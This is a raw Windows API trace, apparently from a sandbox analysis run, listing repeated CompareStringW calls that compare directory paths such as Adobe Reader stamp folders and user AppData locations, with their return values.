1 [0070.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 1 [0070.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 1 [0070.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\", cchCount1=48, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 3 [0070.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount1=78, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 2 [0070.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\", cchCount1=80, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 1 [0070.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\", cchCount1=80, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 1 [0070.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount1=80, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 1 [0070.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\", cchCount1=48, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 1 [0070.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount1=65, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 2 [0070.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\", cchCount1=80, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 1 [0070.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\", cchCount1=80, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 1 [0070.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount1=80, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 1 [0070.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\", cchCount1=48, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 1 [0070.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount1=65, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 2 [0070.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\", cchCount1=80, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\", cchCount2=41) returned 1 [0070.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\", cchCount1=80, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\", cchCount2=41) returned 1 [0070.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount1=80, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\", cchCount2=41) returned 1 [0070.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\", cchCount1=48, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\", cchCount2=41) returned 1 [0070.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount1=65, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\", cchCount2=41) returned 1 [0070.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\", cchCount1=80, lpString2="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount2=68) returned 1 [0070.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\", cchCount1=80, lpString2="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount2=68) returned 1 [0070.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount1=78, lpString2="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount2=68) returned 3 [0070.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount1=80, lpString2="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount2=68) returned 1 [0070.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount1=80, lpString2="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount2=68) returned 1 [0070.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5KV2W3L69- l7u9zN7\\", cchCount2=58) returned 1 [0070.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5KV2W3L69- l7u9zN7\\", cchCount2=58) returned 1 [0070.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount1=78, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5KV2W3L69- l7u9zN7\\", cchCount2=58) returned 1 [0070.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount1=65, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5KV2W3L69- l7u9zN7\\", cchCount2=58) returned 3 [0070.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\", cchCount1=48, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5KV2W3L69- l7u9zN7\\", cchCount2=58) returned 1 [0070.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\", cchCount1=80, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 1 [0070.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount1=80, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 1 [0070.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\", cchCount1=48, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 1 [0070.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount1=65, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 2 [0070.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount2=80) returned 1 [0070.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount2=80) returned 1 [0070.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount2=80) returned 3 [0070.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount1=68, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount2=80) returned 3 [0070.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount2=80) returned 2 [0070.433] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 1 [0070.433] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 1 [0070.433] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\", cchCount1=48, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 3 [0070.433] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount1=68, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 1 [0070.433] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount1=78, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 2 [0070.433] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 1 [0070.433] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 1 [0070.433] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\", cchCount1=48, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 3 [0070.433] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount1=68, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 1 [0070.433] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount1=78, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 2 [0070.433] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\", cchCount1=80, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 1 [0070.433] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount1=80, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 1 [0070.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\", cchCount1=48, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 1 [0070.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount1=65, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 2 [0070.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount2=80) returned 1 [0070.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount2=80) returned 3 [0070.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount2=80) returned 1 [0070.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount2=80) returned 3 [0070.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount2=80) returned 2 [0070.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount2=80) returned 1 [0070.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount2=80) returned 2 [0070.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount2=80) returned 1 [0070.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount2=80) returned 1 [0070.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\", cchCount1=48, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount2=80) returned 3 [0070.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount1=68, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount2=80) returned 3 [0070.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount2=80) returned 2 [0070.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 1 [0070.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 1 [0070.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\", cchCount1=48, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 3 [0070.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount1=68, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 1 [0070.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount1=78, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=78) returned 2 [0070.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", cchCount2=46) returned 1 [0070.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount1=80, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", cchCount2=46) returned 1 [0070.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\", cchCount1=48, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", cchCount2=46) returned 3 [0070.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount1=68, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", cchCount2=46) returned 1 [0070.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount1=78, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", cchCount2=46) returned 1 [0070.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\", cchCount1=80, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\", cchCount2=41) returned 1 [0070.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount1=80, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\", cchCount2=41) returned 1 [0070.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\", cchCount1=48, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\", cchCount2=41) returned 1 [0070.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount1=65, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\", cchCount2=41) returned 1 [0070.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\", cchCount1=41, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\", cchCount2=41) returned 2 [0070.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\", cchCount2=80) returned 3 [0070.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\", cchCount2=80) returned 1 [0070.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\", cchCount2=80) returned 1 [0070.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\", cchCount2=80) returned 1 [0070.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\", cchCount2=80) returned 2 [0070.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount2=80) returned 1 [0070.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount2=80) returned 3 [0070.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount2=80) returned 3 [0070.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount2=80) returned 3 [0070.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount2=80) returned 2 [0070.437] 